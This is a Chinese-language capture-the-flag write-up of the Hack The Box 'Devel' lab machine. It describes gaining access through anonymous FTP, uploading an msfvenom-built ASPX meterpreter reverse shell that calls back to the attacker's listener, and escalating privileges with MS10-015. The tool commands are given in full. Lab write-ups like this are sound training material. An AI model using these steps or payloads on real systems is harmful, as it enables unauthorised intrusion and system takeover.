HTB:Devel渗透测试 – 作者:WAFmax

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/3
描述:图片.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作,通过nmap发现可以匿名登录21端口,上传反向shell进行连接,通过cve漏洞进行提权。

一、信息收集

1、靶机ip

IP地址:10.129.117.99

2、靶机端口服务
nmap -sV -A -O -T4 10.129.117.99

开放了21端口与80端口,并且21端口允许匿名登录
图片.png

3、网站信息收集

首先匿名登录2端口查看是否存在可利用信息
发现存在welcome.png将其下载到kali中查看是否存在隐写
图片.png
不存在隐写
图片.png
查看80端口
通过目录扫描没有发现敏感目录
但是通过查看图片信息知道80端口与21端口储存的位置相同
图片.png

二、漏洞利用

通过第一步信息收集知道,80端口与21端口存储在同个位置,可以在21端口里上传反向shell然后通过80端口执行获取shell。
生成反向shell

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o shell.aspx LHOST=10.10.14.19 LPORT=1234

图片.png
将反向shell上传到21端口
图片.png
利用msf进行连接
图片.png
图片.png
使用meterpreter的background命令挂起这个session
图片.png
重新进入meterpreter获取交互式shell
图片.png

三、提权

因为该靶机是Windows系统可以使用Windows-Exploit-Suggester搜索该系统未打的补丁与漏洞

./windows-exploit-suggester.py --database 2021-03-16-mssb.xls --systeminfo systeminfo

发现存在许多可利用漏洞
图片.png
这里我们使用MS10-015进行提权
图片.png
直接将meterpreter挂起的session写入该载荷并完善配置,直接利用即可
图片.png
成功获取root权限,查看root.txt
图片.png
图片.png

总结

该靶机从刚开始操作到最后的提权,思路比较清晰简单主要是利用靶机对系统没有进行定期的漏洞更新与维护,使用Windows-Exploit-Suggester可以查看系统存在的漏洞版本并进行利用获取最高权限。

来源:freebuf.com 2021-03-21 22:50:37 by: WAFmax

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论